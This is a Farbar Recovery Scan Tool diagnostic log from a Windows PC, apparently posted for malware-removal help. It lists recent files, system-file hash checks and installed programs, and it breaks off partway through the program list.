2014-03-04 14:59 - 2014-03-04 15:02 - 36053658 _____ () C:\Users\AweZome\Downloads\dark horse rmx (1).wav
2014-03-04 14:57 - 2014-03-04 15:03 - 382254088 _____ () C:\Users\AweZome\Desktop\Adamerek's MW2 Prereck Pack P1.rar
2014-03-03 21:18 - 2014-03-04 18:16 - 00000000 ____D () C:\Users\AweZome\Desktop\Bo2
2014-03-03 21:13 - 2014-03-03 21:17 - 00296704 _____ () C:\Users\AweZome\Desktop\pegboard nerds x misterwives - coffins.mp3.sfk
2014-03-03 19:56 - 2014-03-02 07:51 - 00000000 ____D () C:\Users\AweZome\Desktop\Black Ops 2 Pack 5 (Mine)
2014-03-03 15:28 - 2014-03-03 15:37 - 267064974 _____ () C:\Users\AweZome\Downloads\Black Ops 2 Pack 5 (Mine).rar
2014-03-03 14:25 - 2014-03-03 14:25 - 01243588 _____ () C:\Users\AweZome\Desktop\ProcessExplorer.zip
2014-03-03 14:17 - 2014-03-03 14:17 - 00000167 _____ () C:\Users\AweZome\Desktop\Malwarebytes Serial.txt
2014-03-03 14:16 - 2014-03-03 14:16 - 10285040 _____ (Malwarebytes Corporation ) C:\Users\AweZome\Desktop\mbam-setup-1.75.0.1300.exe
2014-03-03 14:13 - 2014-03-03 14:13 - 00594176 _____ () C:\Users\AweZome\Desktop\rkill.rar
2014-03-02 20:57 - 2014-03-02 20:57 - 01437652 _____ () C:\Users\AweZome\Downloads\DrawingBlood.ttf
2014-03-02 20:50 - 2014-03-02 21:01 - 03503940 _____ () C:\Users\AweZome\Desktop\Trei.psd
2014-03-02 20:28 - 2014-03-02 20:28 - 03242590 _____ () C:\Users\AweZome\Desktop\Vorlage.psd
2014-03-02 19:59 - 2014-03-02 19:59 - 04585389 _____ () C:\Users\AweZome\Desktop\Aquarium.rar
2014-03-02 19:59 - 2013-07-15 14:41 - 09924505 _____ () C:\Users\AweZome\Desktop\Aquarium.psd
2014-03-02 19:57 - 2014-03-02 20:01 - 155203113 _____ () C:\Users\AweZome\Desktop\Logo (3).psd
2014-03-02 15:38 - 2014-03-02 15:38 - 00000000 ____D () C:\Users\AweZome\Desktop\Textdokumente Wichtig
2014-02-27 20:23 - 2014-02-27 20:26 - 00000000 ____D () C:\Program Files (x86)\Evrsoft First Page 2006
2014-02-27 20:23 - 2005-09-23 17:02 - 00887296 _____ (Kurt Senfer) C:\Windows\SysWOW64\KsDHTMLEDLib.ocx
2014-02-27 20:20 - 2014-02-27 20:20 - 00613200 _____ (Chip Digital GmbH) C:\Users\AweZome\Downloads\HTML Editor Phase - CHIP-Downloader.exe
2014-02-25 17:55 - 2014-02-25 17:55 - 00004254 _____ () C:\Users\AweZome\Downloads\Moviecfg-CSGO-Mrtweeday(1).rar
2014-02-23 15:59 - 2014-02-23 15:59 - 00004254 _____ () C:\Users\AweZome\Downloads\Moviecfg-CSGO-Mrtweeday.rar
2014-02-23 12:36 - 2014-02-23 12:36 - 00001619 _____ () C:\Users\AweZome\Downloads\Gamecfg-CSGO-Mrtweeday(1).rar
2014-02-21 17:53 - 2014-02-21 17:54 - 00000000 ____D () C:\Process Explorer
2014-02-19 19:57 - 2014-02-19 19:57 - 00001536 _____ () C:\Users\Public\Desktop\Free YouTube to MP3 Converter.lnk
2014-02-19 19:55 - 2014-02-19 19:55 - 34240632 _____ (DVDVideoSoft Ltd. ) C:\Users\AweZome\Downloads\FreeYouTubeToMP3Converter.exe
2014-02-16 13:02 - 2014-02-16 13:02 - 00007603 _____ () C:\Users\AweZome\AppData\Local\Resmon.ResmonCfg
2014-02-14 20:41 - 2014-02-14 20:41 - 00001619 _____ () C:\Users\AweZome\Downloads\Gamecfg-CSGO-Mrtweeday.rar
2014-02-14 16:13 - 2014-02-14 16:13 - 00000000 ____D () C:\Users\AweZome\Documents\Neuer Ordner
2014-02-14 14:38 - 2014-02-14 14:38 - 07423603 _____ (VersaVPN ) C:\Users\AweZome\Downloads\VersaVPN 1.1.2.0.exe
2014-02-14 13:54 - 2014-02-14 13:54 - 01209775 _____ () C:\Windows\unins001.exe
2014-02-14 13:54 - 2014-02-14 13:54 - 00035564 _____ () C:\Windows\unins001.dat
2014-02-14 13:54 - 2014-02-14 13:54 - 00001098 _____ () C:\Users\Public\Desktop\SHARKOON DarkGlider Gaming Mouse.lnk
2014-02-13 20:04 - 2014-02-13 20:16 - 253786099 _____ () C:\Users\AweZome\Downloads\week 121 cines(1).rar
2014-02-13 19:54 - 2014-02-13 20:02 - 00091924 _____ () C:\Users\AweZome\Downloads\week 121 cines.rar
2014-02-13 15:54 - 2014-02-13 16:09 - 373839257 _____ () C:\Users\AweZome\Downloads\Black ops 2 Pack 4.rar
2014-02-12 21:21 - 2014-02-12 21:23 - 23084895 _____ () C:\Users\AweZome\Downloads\kepardsetup.exe
2014-02-12 18:47 - 2014-02-12 18:49 - 74312954 _____ () C:\Users\AweZome\Downloads\OCC Week 121 300fps.rar
2014-02-10 21:59 - 2014-02-10 22:01 - 05206918 _____ () C:\Users\AweZome\Downloads\rüstungen.rar
2014-02-09 18:01 - 2014-02-09 18:07 - 160411672 _____ () C:\Users\AweZome\Downloads\Tyrona.rar
2014-02-07 14:51 - 2014-02-07 14:51 - 00000000 ____D () C:\Users\AweZome\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Counter-Strike Source
2014-02-07 14:28 - 2014-02-07 14:37 - 240954926 _____ () C:\Users\AweZome\Downloads\CSS_Patch_v16_18-12-2006-DZ.exe
2014-02-07 14:28 - 2014-02-07 14:36 - 276709888 _____ () C:\Users\AweZome\Downloads\TextureMapPack.exe
2014-02-07 14:28 - 2014-02-07 14:30 - 12570207 _____ () C:\Users\AweZome\Downloads\CSS_Patch_v18_30-10-2007-DZ.exe
2014-02-07 14:28 - 2014-02-07 14:29 - 09906342 _____ () C:\Users\AweZome\Downloads\CSS_Patch_v17_04-04-2007-DZ.exe
2014-02-07 14:26 - 2014-02-07 14:43 - 733777632 _____ () C:\Users\AweZome\Downloads\CSS_Full_07-07-2005_DIGITALZONE.exe
2014-02-06 15:59 - 2014-02-06 15:59 - 07980403 _____ () C:\Users\AweZome\Downloads\csgo settings.7z
==================== One Month Modified Files and Folders =======
2014-03-07 15:45 - 2014-03-06 19:48 - 00021283 _____ () C:\Users\AweZome\Downloads\FRST.txt
2014-03-07 15:42 - 2013-05-07 17:06 - 00000000 ____D () C:\Users\AweZome\AppData\Local\Adobe
2014-03-07 15:40 - 2013-12-30 16:57 - 00000000 ____D () C:\Users\AweZome\AppData\Local\HTC MediaHub
2014-03-07 15:40 - 2013-10-06 19:10 - 00001108 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job
2014-03-07 15:40 - 2013-05-17 17:03 - 00000000 ____D () C:\Users\AweZome\AppData\Local\LogMeIn Hamachi
2014-03-07 15:39 - 2013-08-17 11:09 - 00061066 _____ () C:\Windows\PFRO.log
2014-03-07 15:39 - 2013-08-17 11:09 - 00039804 _____ () C:\Windows\setupact.log
2014-03-07 15:39 - 2013-05-20 12:17 - 00000000 ____D () C:\ProgramData\VMware
2014-03-07 15:39 - 2009-07-14 06:08 - 00000006 ____H () C:\Windows\Tasks\SA.DAT
2014-03-06 22:12 - 2013-09-02 15:14 - 00000000 ____D () C:\Users\AweZome\AppData\Roaming\Audacity
2014-03-06 22:11 - 2013-12-19 18:57 - 00000000 ____D () C:\Users\AweZome\AppData\Roaming\Skype
2014-03-06 22:05 - 2013-12-26 17:24 - 00000000 ____D () C:\Program Files (x86)\Steam
2014-03-06 21:39 - 2013-10-06 19:10 - 00001112 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job
2014-03-06 21:26 - 2013-05-27 17:28 - 00000884 _____ () C:\Windows\Tasks\Adobe Flash Player Updater.job
2014-03-06 21:05 - 2013-05-29 16:43 - 00000000 ____D () C:\Users\AweZome\AppData\Local\PokIt
2014-03-06 19:48 - 2014-03-06 19:48 - 00000000 ____D () C:\FRST
2014-03-06 19:47 - 2014-03-06 19:47 - 02156544 _____ (Farbar) C:\Users\AweZome\Downloads\FRST64.exe
2014-03-06 17:24 - 2013-05-07 19:21 - 00000000 ____D () C:\Program Files (x86)\Adobe
2014-03-06 17:24 - 2013-05-06 16:52 - 00000000 ____D () C:\Users\AweZome\AppData\Roaming\Adobe
2014-03-06 17:20 - 2013-05-05 21:20 - 01747230 _____ () C:\Windows\WindowsUpdate.log
2014-03-06 16:57 - 2014-03-06 16:52 - 00000000 ____D () C:\Users\AweZome\AppData\Roaming\Telegram Win (Unofficial)
2014-03-06 16:52 - 2014-03-06 16:52 - 05986694 _____ (Telegram (Unofficial) ) C:\Users\AweZome\Downloads\tsetup.0.3.7.exe
2014-03-06 16:52 - 2014-03-06 16:52 - 00001018 _____ () C:\Users\AweZome\Desktop\Telegram.lnk
2014-03-06 16:52 - 2014-03-06 16:52 - 00000000 ____D () C:\Users\AweZome\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Telegram Win (Unofficial)
2014-03-06 16:12 - 2009-07-14 05:45 - 00028128 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2014-03-06 16:12 - 2009-07-14 05:45 - 00028128 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2014-03-05 21:59 - 2014-03-05 21:57 - 00000000 ____D () C:\Users\AweZome\Desktop\Office
2014-03-05 20:43 - 2013-08-14 14:38 - 00000000 ____D () C:\Users\AweZome\Desktop\Skype
2014-03-05 17:59 - 2013-07-10 19:13 - 00000132 _____ () C:\Users\AweZome\AppData\Roaming\Adobe PNG-Format CC - Voreinstellungen
2014-03-05 17:58 - 2014-03-05 17:58 - 02119580 _____ () C:\Users\AweZome\Desktop\Trei2.psd
2014-03-05 17:18 - 2014-03-05 17:18 - 03666833 _____ () C:\Users\AweZome\Desktop\AcarajePlays-TAG.psd
2014-03-04 20:20 - 2014-03-04 20:20 - 00281736 _____ () C:\Users\AweZome\Desktop\dark horse rmx.sfk
2014-03-04 20:20 - 2014-03-04 20:17 - 00000000 ____D () C:\Users\AweZome\Desktop\Download
2014-03-04 18:16 - 2014-03-03 21:18 - 00000000 ____D () C:\Users\AweZome\Desktop\Bo2
2014-03-04 18:07 - 2014-03-04 18:06 - 12461457 _____ () C:\Users\AweZome\Desktop\Ohne Titel.wmv
2014-03-04 15:11 - 2014-03-04 15:11 - 00000000 ____D () C:\Users\AweZome\Desktop\Adamerek's MW2 Prereck Pack P1
2014-03-04 15:03 - 2014-03-04 15:08 - 36053658 _____ () C:\Users\AweZome\Desktop\dark horse rmx.wav
2014-03-04 15:03 - 2014-03-04 14:59 - 36053658 _____ () C:\Users\AweZome\Downloads\dark horse rmx.wav
2014-03-04 15:03 - 2014-03-04 14:57 - 382254088 _____ () C:\Users\AweZome\Desktop\Adamerek's MW2 Prereck Pack P1.rar
2014-03-04 15:02 - 2014-03-04 15:02 - 00000000 ____D () C:\Users\AweZome\Desktop\Things Cod4 [Prerec]
2014-03-04 15:02 - 2014-03-04 14:59 - 36053658 _____ () C:\Users\AweZome\Downloads\dark horse rmx (1).wav
2014-03-03 21:17 - 2014-03-03 21:13 - 00296704 _____ () C:\Users\AweZome\Desktop\pegboard nerds x misterwives - coffins.mp3.sfk
2014-03-03 19:54 - 2013-12-31 13:51 - 00000000 ____D () C:\Users\AweZome\Desktop\Edit
2014-03-03 19:54 - 2013-05-06 15:41 - 01128784 _____ () C:\Users\AweZome\AppData\Local\GDIPFONTCACHEV1.DAT
2014-03-03 15:37 - 2014-03-03 15:28 - 267064974 _____ () C:\Users\AweZome\Downloads\Black Ops 2 Pack 5 (Mine).rar
2014-03-03 14:25 - 2014-03-03 14:25 - 01243588 _____ () C:\Users\AweZome\Desktop\ProcessExplorer.zip
2014-03-03 14:25 - 2010-11-21 07:50 - 00703478 _____ () C:\Windows\system32\perfh007.dat
2014-03-03 14:25 - 2010-11-21 07:50 - 00151184 _____ () C:\Windows\system32\perfc007.dat
2014-03-03 14:25 - 2009-07-14 06:13 - 01627402 _____ () C:\Windows\system32\PerfStringBackup.INI
2014-03-03 14:17 - 2014-03-03 14:17 - 00000167 _____ () C:\Users\AweZome\Desktop\Malwarebytes Serial.txt
2014-03-03 14:16 - 2014-03-03 14:16 - 10285040 _____ (Malwarebytes Corporation ) C:\Users\AweZome\Desktop\mbam-setup-1.75.0.1300.exe
2014-03-03 14:13 - 2014-03-03 14:13 - 00594176 _____ () C:\Users\AweZome\Desktop\rkill.rar
2014-03-03 14:07 - 2009-07-14 05:45 - 07844608 _____ () C:\Windows\system32\FNTCACHE.DAT
2014-03-02 21:01 - 2014-03-02 20:50 - 03503940 _____ () C:\Users\AweZome\Desktop\Trei.psd
2014-03-02 20:57 - 2014-03-02 20:57 - 01437652 _____ () C:\Users\AweZome\Downloads\DrawingBlood.ttf
2014-03-02 20:28 - 2014-03-02 20:28 - 03242590 _____ () C:\Users\AweZome\Desktop\Vorlage.psd
2014-03-02 20:01 - 2014-03-02 19:57 - 155203113 _____ () C:\Users\AweZome\Desktop\Logo (3).psd
2014-03-02 19:59 - 2014-03-02 19:59 - 04585389 _____ () C:\Users\AweZome\Desktop\Aquarium.rar
2014-03-02 17:44 - 2013-12-31 17:05 - 00000000 ____D () C:\Users\AweZome\Desktop\Nocturnal3
2014-03-02 17:43 - 2014-02-03 16:14 - 00000243 _____ () C:\Users\AweZome\Desktop\Krazz.reg
2014-03-02 15:47 - 2013-11-22 20:29 - 00000000 ___RD () C:\Users\AweZome\Desktop\#FX
2014-03-02 15:45 - 2013-05-04 20:01 - 00000000 ___RD () C:\Users\AweZome\Desktop\Design Pack
2014-03-02 15:39 - 2013-10-16 19:28 - 00000000 ____D () C:\Users\AweZome\Desktop\RAT, BOOT, EXPLOIT
2014-03-02 15:38 - 2014-03-02 15:38 - 00000000 ____D () C:\Users\AweZome\Desktop\Textdokumente Wichtig
2014-03-02 15:36 - 2013-10-03 13:39 - 00000000 ____D () C:\Users\AweZome\AppData\Roaming\vlc
2014-03-02 15:36 - 2013-05-06 18:04 - 00000000 ___RD () C:\Users\AweZome\Desktop\Alben
2014-03-02 07:51 - 2014-03-03 19:56 - 00000000 ____D () C:\Users\AweZome\Desktop\Black Ops 2 Pack 5 (Mine)
2014-02-27 20:26 - 2014-02-27 20:23 - 00000000 ____D () C:\Program Files (x86)\Evrsoft First Page 2006
2014-02-27 20:20 - 2014-02-27 20:20 - 00613200 _____ (Chip Digital GmbH) C:\Users\AweZome\Downloads\HTML Editor Phase - CHIP-Downloader.exe
2014-02-27 15:03 - 2013-10-03 08:24 - 00000000 ____D () C:\Program Files (x86)\LogMeIn Hamachi
2014-02-25 17:55 - 2014-02-25 17:55 - 00004254 _____ () C:\Users\AweZome\Downloads\Moviecfg-CSGO-Mrtweeday(1).rar
2014-02-23 15:59 - 2014-02-23 15:59 - 00004254 _____ () C:\Users\AweZome\Downloads\Moviecfg-CSGO-Mrtweeday.rar
2014-02-23 14:03 - 2013-08-25 21:24 - 00202583 _____ () C:\Windows\DirectX.log
2014-02-23 12:36 - 2014-02-23 12:36 - 00001619 _____ () C:\Users\AweZome\Downloads\Gamecfg-CSGO-Mrtweeday(1).rar
2014-02-21 17:54 - 2014-02-21 17:53 - 00000000 ____D () C:\Process Explorer
2014-02-19 19:57 - 2014-02-19 19:57 - 00001536 _____ () C:\Users\Public\Desktop\Free YouTube to MP3 Converter.lnk
2014-02-19 19:57 - 2013-05-16 13:48 - 00000000 ____D () C:\Users\AweZome\AppData\Roaming\DVDVideoSoft
2014-02-19 19:57 - 2013-05-16 13:48 - 00000000 ____D () C:\Program Files (x86)\DVDVideoSoft
2014-02-19 19:55 - 2014-02-19 19:55 - 34240632 _____ (DVDVideoSoft Ltd. ) C:\Users\AweZome\Downloads\FreeYouTubeToMP3Converter.exe
2014-02-17 15:22 - 2013-08-16 15:10 - 00000000 ____D () C:\Program Files (x86)\Mozilla Maintenance Service
2014-02-16 13:02 - 2014-02-16 13:02 - 00007603 _____ () C:\Users\AweZome\AppData\Local\Resmon.ResmonCfg
2014-02-16 10:06 - 2013-10-01 14:53 - 00000000 ____D () C:\Program Files (x86)\Mozilla Firefox
2014-02-15 21:23 - 2013-07-13 21:40 - 00000000 ____D () C:\Users\AweZome\AppData\Roaming\TS3Client
2014-02-15 21:22 - 2013-05-17 21:03 - 00000000 ____D () C:\Users\AweZome\AppData\Roaming\TeamViewer
2014-02-15 20:38 - 2013-05-20 14:05 - 00000000 ____D () C:\Users\AweZome\AppData\Local\Paint.NET
2014-02-14 20:41 - 2014-02-14 20:41 - 00001619 _____ () C:\Users\AweZome\Downloads\Gamecfg-CSGO-Mrtweeday.rar
2014-02-14 16:13 - 2014-02-14 16:13 - 00000000 ____D () C:\Users\AweZome\Documents\Neuer Ordner
2014-02-14 14:38 - 2014-02-14 14:38 - 07423603 _____ (VersaVPN ) C:\Users\AweZome\Downloads\VersaVPN 1.1.2.0.exe
2014-02-14 14:38 - 2013-11-07 19:45 - 00001937 _____ () C:\Users\AweZome\Desktop\VersaVPN.lnk
2014-02-14 14:38 - 2013-10-29 15:17 - 00000000 ____D () C:\Program Files (x86)\VersaVPN
2014-02-14 13:54 - 2014-02-14 13:54 - 01209775 _____ () C:\Windows\unins001.exe
2014-02-14 13:54 - 2014-02-14 13:54 - 00035564 _____ () C:\Windows\unins001.dat
2014-02-14 13:54 - 2014-02-14 13:54 - 00001098 _____ () C:\Users\Public\Desktop\SHARKOON DarkGlider Gaming Mouse.lnk
2014-02-14 13:54 - 2013-07-30 10:01 - 00000000 ____D () C:\Program Files (x86)\SHARKOON DarkGlider
2014-02-13 20:16 - 2014-02-13 20:04 - 253786099 _____ () C:\Users\AweZome\Downloads\week 121 cines(1).rar
2014-02-13 20:02 - 2014-02-13 19:54 - 00091924 _____ () C:\Users\AweZome\Downloads\week 121 cines.rar
2014-02-13 16:09 - 2014-02-13 15:54 - 373839257 _____ () C:\Users\AweZome\Downloads\Black ops 2 Pack 4.rar
2014-02-12 21:23 - 2014-02-12 21:21 - 23084895 _____ () C:\Users\AweZome\Downloads\kepardsetup.exe
2014-02-12 21:23 - 2013-10-05 14:33 - 00000000 ____D () C:\Program Files (x86)\Kepard
2014-02-12 21:03 - 2013-05-05 21:36 - 00000000 ___RD () C:\Users\AweZome\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
2014-02-12 18:49 - 2014-02-12 18:47 - 74312954 _____ () C:\Users\AweZome\Downloads\OCC Week 121 300fps.rar
2014-02-11 17:09 - 2009-07-14 04:20 - 00000000 ____D () C:\Windows\system32\NDF
2014-02-11 16:29 - 2013-05-14 12:59 - 00000000 ____D () C:\Users\AweZome\AppData\Local\Downloaded Installations
2014-02-11 10:33 - 2013-10-06 19:10 - 00004108 _____ () C:\Windows\System32\Tasks\GoogleUpdateTaskMachineUA
2014-02-11 10:33 - 2013-10-06 19:10 - 00003856 _____ () C:\Windows\System32\Tasks\GoogleUpdateTaskMachineCore
2014-02-10 22:01 - 2014-02-10 21:59 - 05206918 _____ () C:\Users\AweZome\Downloads\rüstungen.rar
2014-02-10 13:41 - 2013-12-10 15:36 - 00000000 ____D () C:\Program Files (x86)\Acunetix
2014-02-10 12:50 - 2013-12-19 14:27 - 00000000 __SHD () C:\ProgramData\GNGDMQ
2014-02-10 12:50 - 2013-10-15 23:01 - 00000000 ___HD () C:\Users\AweZome\Documents\MSDCSC
2014-02-09 20:25 - 2013-10-27 10:30 - 00000132 _____ () C:\Users\AweZome\AppData\Roaming\Adobe IllExport-Filter CC - Voreinstellungen
2014-02-09 18:07 - 2014-02-09 18:01 - 160411672 _____ () C:\Users\AweZome\Downloads\Tyrona.rar
2014-02-09 10:26 - 2013-05-15 14:44 - 00000000 ____D () C:\Users\AweZome\.VirtualBox
2014-02-08 12:19 - 2009-07-14 06:08 - 00032632 _____ () C:\Windows\Tasks\SCHEDLGU.TXT
2014-02-07 14:51 - 2014-02-07 14:51 - 00000000 ____D () C:\Users\AweZome\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Counter-Strike Source
2014-02-07 14:43 - 2014-02-07 14:26 - 733777632 _____ () C:\Users\AweZome\Downloads\CSS_Full_07-07-2005_DIGITALZONE.exe
2014-02-07 14:37 - 2014-02-07 14:28 - 240954926 _____ () C:\Users\AweZome\Downloads\CSS_Patch_v16_18-12-2006-DZ.exe
2014-02-07 14:36 - 2014-02-07 14:28 - 276709888 _____ () C:\Users\AweZome\Downloads\TextureMapPack.exe
2014-02-07 14:30 - 2014-02-07 14:28 - 12570207 _____ () C:\Users\AweZome\Downloads\CSS_Patch_v18_30-10-2007-DZ.exe
2014-02-07 14:29 - 2014-02-07 14:28 - 09906342 _____ () C:\Users\AweZome\Downloads\CSS_Patch_v17_04-04-2007-DZ.exe
2014-02-06 15:59 - 2014-02-06 15:59 - 07980403 _____ () C:\Users\AweZome\Downloads\csgo settings.7z
Some content of TEMP:
====================
C:\Users\AweZome\AppData\Local\Temp\Creative Cloud Helper.exe
==================== Bamital & volsnap Check =================
C:\Windows\System32\winlogon.exe => MD5 is legit
C:\Windows\System32\wininit.exe => MD5 is legit
C:\Windows\SysWOW64\wininit.exe => MD5 is legit
C:\Windows\explorer.exe
[2010-11-21 04:24] - [2010-11-21 04:24] - 2712576 ____A (Microsoft Corporation) 988E172F55EEEFB31A4E541D4D5417B3
C:\Windows\SysWOW64\explorer.exe
[2010-11-21 04:24] - [2010-11-21 04:24] - 2456576 ____A (Microsoft Corporation) 38A74018D915A119D6C22C668390309C
C:\Windows\System32\svchost.exe => MD5 is legit
C:\Windows\SysWOW64\svchost.exe => MD5 is legit
C:\Windows\System32\services.exe => MD5 is legit
C:\Windows\System32\User32.dll => MD5 is legit
C:\Windows\SysWOW64\User32.dll => MD5 is legit
C:\Windows\System32\userinit.exe => MD5 is legit
C:\Windows\SysWOW64\userinit.exe => MD5 is legit
C:\Windows\System32\rpcss.dll => MD5 is legit
C:\Windows\System32\Drivers\volsnap.sys => MD5 is legit
LastRegBack: 2014-02-28 15:54
==================== End Of Log ============================
--- --- --- Addition.txt Code:
ATTFilter Additional scan result of Farbar Recovery Scan Tool (x64) Version: 06-03-2014
Ran by AweZome at 2014-03-07 15:46:12
Running from C:\Users\AweZome\Downloads
Boot Mode: Normal
==========================================================
==================== Security Center ========================
AS: Windows Defender (Enabled - Out of date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
==================== Installed Programs ======================
µTorrent (HKLM-x32\...\uTorrent) (Version: 3.3.0.29609 - BitTorrent Inc.)
7-Zip 9.20 (x64 edition) (HKLM\...\{23170F69-40C1-2702-0920-000001000000}) (Version: 9.20.00.0 - Igor Pavlov)
Acunetix Web Vulnerability Scanner 8.0 (HKLM-x32\...\{DBD76811-6CF0-4A15-9436-B779C3A36929}_is1) (Version: 8.0 - Acunetix)
Acunetix Web Vulnerability Scanner 9.0 (HKLM-x32\...\{ffec63c3-090d-45ea-afd7-eab07edb5822}_is1) (Version: 9.0 - Acunetix)
Adobe After Effects CS6 (HKLM-x32\...\{4817D846-700B-474E-A31B-80892B3E92E3}) (Version: 11 - Adobe Systems Incorporated)
Adobe AIR (HKLM-x32\...\Adobe AIR) (Version: 3.1.0.4880 - Adobe Systems Incorporated)
Adobe AIR (x32 Version: 3.1.0.4880 - Adobe Systems Incorporated) Hidden
Adobe Creative Cloud (HKLM-x32\...\Adobe Creative Cloud) (Version: 2.4.1.351 - Adobe Systems Incorporated)
Adobe Dreamweaver CC (HKLM-x32\...\{00E094E1-A852-11E2-803D-ACEA632352B4}) (Version: 13 - Adobe Systems Incorporated)
Adobe Dreamweaver CS5.5 (HKLM-x32\...\{0215A652-E081-4B09-9333-DC85AAB67FFA}) (Version: 11.5 - Adobe Systems Incorporated)
Adobe Edge Code CC (HKLM-x32\...\{641F742F-1497-51B4-F481-1037096A90A0}) (Version: 0.97 - Adobe Systems Incorporated)
Adobe Flash Player 11 ActiveX (HKLM-x32\...\Adobe Flash Player ActiveX) (Version: 11.7.700.224 - Adobe Systems Incorporated)
Adobe Flash Player 11 Plugin (HKLM-x32\...\Adobe Flash Player Plugin) (Version: 11.9.900.152 - Adobe Systems Incorporated)
Adobe Help Manager (HKLM-x32\...\chc.4875E02D9FB21EE389F73B8D1702B320485DF8CE.1) (Version: 4.0.244 - Adobe Systems Incorporated)
Adobe Help Manager (x32 Version: 4.0.244 - Adobe Systems Incorporated) Hidden
Adobe Illustrator CC (HKLM-x32\...\{F2321021-08A2-44D6-B1DF-BDB415F23EC3}) (Version: 17.0 - Adobe Systems Incorporated)
Adobe Photoshop CC (HKLM-x32\...\{2D99B50E-431D-4AA8-85C1-172A6F8BCF09}) (Version: 14.0 - Adobe Systems Incorporated)
Adobe Photoshop CS6 (HKLM-x32\...\{74EB3499-8B95-4B5C-96EB-7B342F3FD0C6}) (Version: 13.0 - Adobe Systems Incorporated)
Adobe Widget Browser (HKLM-x32\...\com.adobe.WidgetBrowser.E7BED6E5DDA59983786DD72EBFA46B1598278E07.1) (Version: 2.0 Build 230 - Adobe Systems Incorporated.)
Adobe Widget Browser (x32 Version: 2.0.230 - Adobe Systems Incorporated.) Hidden
AMD Accelerated Video Transcoding (Version: 13.20.100.30926 - Advanced Micro Devices, Inc.) Hidden
AMD Catalyst Control Center (x32 Version: 2013.0926.1629.27759 - Ihr Firmenname) Hidden
AMD Catalyst Install Manager (HKLM\...\{EEC2E449-BD9D-C19A-844A-564E1452DBD9}) (Version: 8.0.915.0 - Advanced Micro Devices, Inc.)
AMD Drag and Drop Transcoding (Version: 2.00.0000 - Advanced Micro Devices, Inc.) Hidden
AMD Fuel (Version: 2013.0926.1629.27759 - Ihr Firmenname) Hidden
AMD Media Foundation Decoders (Version: 1.0.80926.1653 - Advanced Micro Devices, Inc.) Hidden
AMD Steady Video Plug-In (Version: 2.06.0000 - AMD) Hidden
AMD Wireless Display v3.0 (Version: 1.0.0.14 - Advanced Micro Devices, Inc.) Hidden
Apple Application Support (HKLM-x32\...\{5D09C772-ECB3-442B-9CC6-B4341C78FDC2}) (Version: 2.3.4 - Apple Inc.)
Application Profiles (HKLM-x32\...\{148971EC-8755-A666-D384-8F2E9E8B0DC8}) (Version: 2.0.4854.34117 - Advanced Micro Devices, Inc.)
Arma 2: Operation Arrowhead (HKLM-x32\...\Steam App 33930) (Version: - Bohemia Interactive)
Assassin's Creed II (HKLM-x32\...\Steam App 33230) (Version: - Ubisoft Montreal)
Audacity 2.0.3 (HKLM-x32\...\Audacity_is1) (Version: 2.0.3 - Audacity Team)
Audio Recorder Pro 3.70 (HKLM-x32\...\Audio Recorder Pro_is1) (Version: - )
AVIcodec (remove only) (HKLM-x32\...\AVIcodec) (Version: - )
AviSynth 2.5 (HKLM-x32\...\AviSynth) (Version: - )
BattlEye for OA Uninstall (HKLM-x32\...\BattlEye for OA) (Version: - )
BitTorrent (HKLM-x32\...\BitTorrent) (Version: 7.8.0.29676 - BitTorrent Inc.)
Cain & Abel 4.9.46 (HKLM-x32\...\Cain & Abel 4.9.46) (Version: - )
Call of Duty(R) 4 - Modern Warfare(TM) (HKLM-x32\...\InstallShield_{E48469CC-635E-4FD5-A122-1497C286D217}) (Version: 1.00.0000 - Activision)
Call of Duty(R) 4 - Modern Warfare(TM) (x32 Version: 1.00.0000 - Activision) Hidden
Call of Duty: Black Ops (HKLM-x32\...\Call of Duty: Black Ops_is1) (Version: - )
Catalyst Control Center - Branding (x32 Version: 1.00.0000 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Graphics Previews Common (x32 Version: 2013.0926.1629.27759 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center InstallProxy (x32 Version: 2013.0926.1629.27759 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Localization All (x32 Version: 2013.0926.1629.27759 - Advanced Micro Devices, Inc.) Hidden
CCC Help Chinese Standard (x32 Version: 2013.0926.1628.27759 - Advanced Micro Devices, Inc.) Hidden
CCC Help Chinese Traditional (x32 Version: 2013.0926.1628.27759 - Advanced Micro Devices, Inc.) Hidden
CCC Help Czech (x32 Version: 2013.0926.1628.27759 - Advanced Micro Devices, Inc.) Hidden
CCC Help Danish (x32 Version: 2013.0926.1628.27759 - Advanced Micro Devices, Inc.) Hidden
CCC Help Dutch (x32 Version: 2013.0926.1628.27759 - Advanced Micro Devices, Inc.) Hidden
CCC Help English (x32 Version: 2013.0926.1628.27759 - Advanced Micro Devices, Inc.) Hidden
CCC Help Finnish (x32 Version: 2013.0926.1628.27759 - Advanced Micro Devices, Inc.) Hidden
CCC Help French (x32 Version: 2013.0926.1628.27759 - Advanced Micro Devices, Inc.) Hidden
CCC Help German (x32 Version: 2013.0926.1628.27759 - Advanced Micro Devices, Inc.) Hidden
CCC Help Greek (x32 Version: 2013.0926.1628.27759 - Advanced Micro Devices, Inc.) Hidden
CCC Help Hungarian (x32 Version: 2013.0926.1628.27759 - Advanced Micro Devices, Inc.) Hidden
CCC Help Italian (x32 Version: 2013.0926.1628.27759 - Advanced Micro Devices, Inc.) Hidden
CCC Help Japanese (x32 Version: 2013.0926.1628.27759 - Advanced Micro Devices, Inc.) Hidden
CCC Help Korean (x32 Version: 2013.0926.1628.27759 - Advanced Micro Devices, Inc.) Hidden
CCC Help Norwegian (x32 Version: 2013.0926.1628.27759 - Advanced Micro Devices, Inc.) Hidden
CCC Help Polish (x32 Version: 2013.0926.1628.27759 - Advanced Micro Devices, Inc.) Hidden
CCC Help Portuguese (x32 Version: 2013.0926.1628.27759 - Advanced Micro Devices, Inc.) Hidden
